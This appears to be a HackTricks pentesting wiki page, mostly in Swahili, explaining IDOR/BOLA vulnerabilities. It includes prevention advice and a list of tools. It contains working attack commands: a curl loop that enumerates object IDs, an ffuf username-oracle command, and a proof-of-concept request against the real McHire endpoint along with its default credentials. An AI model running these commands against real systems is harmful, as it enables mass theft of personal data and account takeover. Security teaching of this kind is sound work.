HackTricksIDOR (Insecure Direct Object Reference)
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hutokea wakati endpoint ya wavuti au API inafichua au inakubali kitambulisho kinachosimamiwa na mtumiaji kinachotumika moja kwa moja kufikia object ya ndani bila kuthibitisha kwamba mtumiaji anayetoa ombi ana ruhusa ya kufikia/kuhariri object hiyo. Matumizi ya mafanikio kawaida huruhusu horizontal au vertical privilege-escalation, kama kusoma au kubadilisha data za watumiaji wengine na, katika kesi mbaya kabisa, full account takeover au mass-data exfiltration.
1. Kutambua IDOR Zenyewezekano
- Tafuta vigezo vinavyorejea object:
- Path:
/api/user/1234,/files/550e8400-e29b-41d4-a716-446655440000 - Query:
?id=42,?invoice=2024-00001 - Body / JSON:
{"user_id": 321, "order_id": 987} - Headers / Cookies:
X-Client-ID: 4711
- Pendelea endpoints zinazofanya kusoma au kusasisha data (
GET,PUT,PATCH,DELETE). - Tambua wakati vitambulisho ni mfululizo au vinavyoweza kutabirika β ikiwa ID yako ni
64185742, basi64185741pengine ipo. - Chunguza njia zilizofichika au mbadala (mfano "Paradox team members" link kwenye kurasa za kuingia) ambazo zinaweza kufichua API za ziada.
- Tumia kikao kilicho thibitishwa chenye ruhusa ndogo na badilisha tu ID huku ukibakisha token/cookie ile ile. Kutokuwepo kwa kosa la authorization kawaida ni dalili ya IDOR.
Kuibadilisha kwa mkono kwa haraka (Burp Repeater)
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json
{"lead_id":64185741}
Uorodheshaji uliootomatishwa (Burp Intruder / curl loop)
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-H "Cookie: auth=$TOKEN" \
-d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done
Error-response oracle for user/file enumeration
Wakati download endpoint inakubali username na filename (mfano /view.php?username=<u>&file=<f>), tofauti ndogo katika error messages mara nyingi huunda oracle:
- Username isiyokuwepo β "User not found"
- Filename mbaya lakini extension halali β "File does not exist" (mara nyingine pia huorodhesha available files)
- Extension mbaya β validation error
Kwa authenticated session yoyote, unaweza fuzz parameter ya username huku ukitumia benign filename na kuchuja kwa string "user not found" ili kugundua watumiaji halali:
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
Mara tu majina halali ya watumiaji yanapotambuliwa, omba faili maalum moja kwa moja (mfano, /view.php?username=amanda&file=privacy.odt). Mfumo huu mara nyingi husababisha ufunuo usioidhinishwa wa nyaraka za watumiaji wengine na credential leakage.
2. Mfano wa Kesi wa Maisha Halisi β McHire Chatbot Platform (2025)
Wakati wa tathmini ya portal ya uajiri ya Paradox.ai-powered McHire, IDOR ifuatayo iligunduliwa:
- Endpoint:
PUT /api/lead/cem-xhr - Authorization: cookie ya kikao cha mtumiaji kwa akaunti ya mtihani ya mgahawa yoyote
- Body parameter:
{"lead_id": N}β kitambulisho la nambari lenye tarakimu 8, mfululizo
Kwa kupunguza lead_id mjaribu alipata PII kamili ya waombaji (jina, barua pepe, nambari ya simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja ambayo iliruhusu kuiba kikao. Uorodhesha wa mfululizo 1 β 64,185,742 ulifunua takriban 64 million rekodi.
Proof-of-Concept request:
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-d '{"lead_id":64185741}'
Combined with default admin credentials (123456:123456) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
3. Athari za IDOR / BOLA
- Ukuaji wa usawa β soma/rekebisha/futa data za watumiaji wengine.
- Ukuaji wa wima β mtumiaji mwenye ruhusa ndogo anapata kazi zinazotumika tu kwa admin.
- Uvunjaji mkubwa wa data ikiwa vitambulisho viko kwa msururu (mfano, applicant IDs, invoices).
- Kunyakuliwa kwa akaunti kwa kuiba tokens au kuweka upya nywila za watumiaji wengine.
4. Uzuiaji na Mbinu Bora
- Lazimisha object-level authorization kwenye kila ombi (
user_id == session.user). - Tumia indirect, unguessable identifiers (UUIDv4, ULID) badala ya auto-increment IDs.
- Fanya authorization upande wa server, usitegemee hidden form fields au UI controls.
- Tekeleza RBAC / ABAC checks kwenye middleware ya kati.
- Ongeza rate-limiting & logging ili kugundua enumeration ya IDs.
- Fanya security test kwa kila endpoint mpya (unit, integration, na DAST).
5. Zana
- BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
- OWASP ZAP: Auth Matrix, Forced Browse.
- Github projects:
bwapp-idor-scanner,Blindy(bulk IDOR hunting).
References
- McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicantsβ PII
- OWASP Top 10 β Broken Access Control
- How to Find More IDORs β Vickie Li
- HTB Nocturnal: IDOR oracle β file theft
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.